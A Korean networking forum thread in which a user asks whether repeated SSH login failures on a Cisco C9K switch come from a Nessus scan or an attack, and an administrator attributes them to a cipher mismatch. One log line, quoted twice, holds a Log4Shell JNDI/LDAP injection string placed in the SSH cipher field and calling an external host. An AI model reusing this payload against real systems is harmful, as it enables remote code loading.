lupineye Posted April 13, 2022 Share Posted April 13, 2022 (edited) C9K IOS-XE gateway에 지속적으로 이런 log가 뜨는데, 이게 Nessus application에서 스위치로 SSH vulnerability 테스트를 하는 건지, Attack인지 잘 모르겠네요. NOC에서는 정보가 없고 아무것도 모르고 QID-375964 VIT3546584 Oracle Java SE Critical Patch Update - October 2021 (CPUOCT2021) 위와 같은 message만 자동으로 날려주거든요. source ip는 특정 몇개의 ip로 바뀌면서 날라오네요. 아주 랜덤하게 바뀌면서 날라 오지는 않아 보임니다. ================================================================================================ 651640: Apr 12 08:10:37.945 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:37 UTC Tue Apr 12 2022 651641: Apr 12 08:10:40.096 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:40 UTC Tue Apr 12 2022 651642: Apr 12 08:10:43.412 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:43 UTC Tue Apr 12 2022 651643: Apr 12 08:10:46.849 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:46 UTC Tue Apr 12 2022 651644: Apr 12 08:10:52.318 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:52 UTC Tue Apr 12 2022 651645: Apr 12 08:10:55.647 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:55 UTC Tue Apr 12 2022 651646: Apr 12 08:11:04.941 UTC: %SSH-3-NO_MATCH: No matching cipher found: client ${jndi:ldap://log4shell-ssh-awXxH9QLamxmzdZVHtGQ${lower:ten}.w.nessus.org/nessus} server aes128-ctr,aes192-ctr,aes256-ctr 651647: Apr 12 08:11:42.645 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:42 UTC Tue Apr 12 2022 651648: Apr 12 08:11:45.582 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:45 UTC Tue Apr 12 2022 651649: Apr 12 08:11:48.088 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:48 UTC Tue Apr 12 2022 651650: Apr 12 08:11:50.289 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:50 UTC Tue Apr 12 2022 651651: Apr 12 08:11:53.681 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:53 UTC Tue Apr 12 2022 =============================================================================================================== >>>>>> 보통 credential을 잘못 쓰면 아래와 같이 log가 됨. 653123: Apr 13 16:42:54.754 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.120.1.2] [localport: 22] [Reason: Login Authentication Failed] at 16:42:54 UTC Wed Apr 13 2022 653124: Apr 13 16:42:54.979 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: f-nmsauto] [Source: 10.120.1.2] [localport: 22] at 16:42:54 UTC Wed Apr 13 2022 Edited April 13, 2022 by lupineye Quote Link to comment Share on other sites More sharing options...
Administrators Master Posted April 14, 2022 Administrators Share Posted April 14, 2022 On 2022. 4. 13. at 오전 9시 41분, lupineye said: 651646: Apr 12 08:11:04.941 UTC: %SSH-3-NO_MATCH: No matching cipher found: client ${jndi:ldap://log4shell-ssh-awXxH9QLamxmzdZVHtGQ${lower:ten}.w.nessus.org/nessus} server aes128-ctr,aes192-ctr,aes256-ctr You got this error because there is no matching cipher suit between the two. From the list of supported ciphers it doesn't look like another networking device or appliance, I don't recall seeing too many openssh ciphers on them. 라고 설명된 정보가 있네요. SSH로 접근하려는 Client와 Cisco 장비간에 암호화 방식을 비교해 보셔야 할 것 같습니다. 동일한데도 문제가 발생한다면 다시 글을 남겨주세요. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.